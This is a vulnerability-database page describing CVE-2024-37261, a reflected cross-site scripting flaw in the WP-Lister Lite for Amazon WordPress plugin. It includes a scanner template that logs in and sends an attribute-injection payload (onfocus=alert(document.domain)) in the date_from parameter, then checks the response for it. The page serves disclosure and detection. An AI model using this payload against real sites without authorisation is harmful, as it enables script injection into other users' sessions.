/Vulnerability Library

WP-Lister Lite for Amazon <= 2.6.16 - Cross-Site Scripting

CVE-2024-37261
Verified

Description

The WP-Lister Lite for Amazon plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 2.6.16 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

Severity

Medium

CVSS Score

6.1

Exploit Probability

1%

Affected Product

wp-lister-lite-for-amazon

Published Date

February 6, 2026

Template Author

kazgangap

CVE-2024-37261.yaml
id: CVE-2024-37261

info:
  name: WP-Lister Lite for Amazon <= 2.6.16 - Cross-Site Scripting
  author: Kazgangap
  severity: medium
  description: |
    The WP-Lister Lite for Amazon plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 2.6.16 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
  reference:
    - https://patchstack.com/database/vulnerability/wp-lister-for-amazon/wordpress-wp-lister-lite-for-amazon-plugin-2-6-16-reflected-cross-site-scripting-xss-vulnerability
    - https://wordpress.org/plugins/wp-lister-for-amazon/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-37261
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-37261
    epss-score: 0.0063
    epss-percentile: 0.46195
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 2
    vendor: wplab
    product: wp-lister-lite-for-amazon
  tags: cve,cve2024,wordpress,wp,wp-plugin,wp-lister-for-amazon,xss,vkev,authenticated

variables:
  rand: '{{to_lower(rand_text_alpha(12))}}'

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/admin.php?page=wpla-tools&tab=stock_log&date_from={{rand}}%22+autofocus+onfocus%3D%22alert%28document.domain%29%22+x%3D%22 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'value="{{rand}}\" autofocus onfocus=\"alert(document.domain)\"'
          - 'name="date_from"'
        condition: and

      - type: word
        part: content_type
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 490a0046304402200f4092dc756705541144d79186618a0596173c811b3b65e23b62d8531bc6f65a02204cab1bfe4a6f9c9f9b9ec7640e34304592016b6b5df0256c94451b00988533f4:922c64590222798bb761d5b6d8e72950
6.1Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID:
cve-2024-37261
CWE ID:
cwe-79

References

https://patchstack.com/database/vulnerability/wp-lister-for-amazon/wordpress-wp-lister-lite-for-amazon-plugin-2-6-16-reflected-cross-site-scripting-xss-vulnerabilityhttps://wordpress.org/plugins/wp-lister-for-amazon/https://nvd.nist.gov/vuln/detail/CVE-2024-37261